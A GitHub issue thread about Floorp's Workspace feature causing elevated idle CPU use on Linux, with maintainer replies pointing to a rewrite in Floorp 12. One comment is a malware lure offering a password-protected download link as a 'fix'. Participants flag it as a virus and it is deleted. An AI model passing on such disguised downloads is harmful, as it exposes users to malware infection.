### ISSUE TITLE
[Bug]: Workspace is using idle CPU

### ISSUE THREAD

**Issue by gunir** [Floorp-Projects/Floorp#1396]
### Pre-Submission Checklist

- [X] I have checked the existing/closed issues to ensure this issue has not already been reported.
- [X] I am using the latest supported version of the browser.
- [X] I have tried disabling all browser extensions/add-ons to rule out interference from these.
- [X] I have tried clearing the browser cache and cookies.
- [X] I have checked with a new profile and the issue still occurs.
- [X] I have provided detailed step-by-step instructions on how to reproduce the issue.
- [X] I have included relevant screenshots or console outputs.
- [X] I have checked that this problem is not occurring in the latest version of Firefox ESR.
- [X] This issue is specific to this browser and does not occur in other browsers.

### Bug Summary

After I've measured pretty thoroughly, I'm 100% confident that Floorp Workspace is causing itself to waste extra CPU cycle for no reason, please take a look at this:

This is Floorp with Workspace enabled and Task Manager:
![image](https://github.com/user-attachments/assets/754a9140-c881-4a42-b33e-8b9eb105e0c0)

This is Floorp with Workspace disabled and Task Manager:
![image](https://github.com/user-attachments/assets/66cab119-2b64-47bd-83c3-8fde40980620)

### Reproduction Steps

1. Open Task Manager
2. Enable/Disable Workspace
3. Check Idle CPU Usage

### Expected Behavior

Floorp should use about 0-0.25% CPU when idle with Workspace enabled

### Actual Behavior

Floorp is using 3-4.5% CPU when idle with Workspace enabled

### Screenshots

This is Floorp with Workspace enabled and Task Manager:
![image](https://github.com/user-attachments/assets/754a9140-c881-4a42-b33e-8b9eb105e0c0)

This is Floorp with Workspace disabled and Task Manager:
![image](https://github.com/user-attachments/assets/66cab119-2b64-47bd-83c3-8fde40980620)

### Browser Version

11.17.7

### Operating System

Linux Lubuntu

### Additional Context

All explained.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by creeper-0910** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

What is this?

**Comment by gunir** [comment]
> What is this?

It's virus, delete his post.

**Comment by creeper-0910** [comment]
> > What is this?
> 
> It's virus, delete his post.

I recommend that you report it to github.
We will remove it after a few minutes.

**Comment by gunir** [comment]
> > > What is this?
> > 
> > 
> > It's virus, delete his post.
> 
> I recommend that you report it to github. We will remove it after a few minutes.

This repo doesn't allow user to report post, I basically can't

**Comment by creeper-0910** [comment]
Deleted.

**Comment by surapunoyousei** [comment]
Floorp's workspace runs on top of a complex code consisting of 20,000 lines of code to ensure proper operation.

This is the intention, but the problem will soon be solved as Floorp 12 will synchronize workspaces in multiple windows!

**Comment by surapunoyousei** [comment]
As is clear from the functionality, Floorp's workspace is organized by window.

This is the reason.

**Comment by surapunoyousei** [comment]
At Floorp 12, I re-implement new workspaces feature!
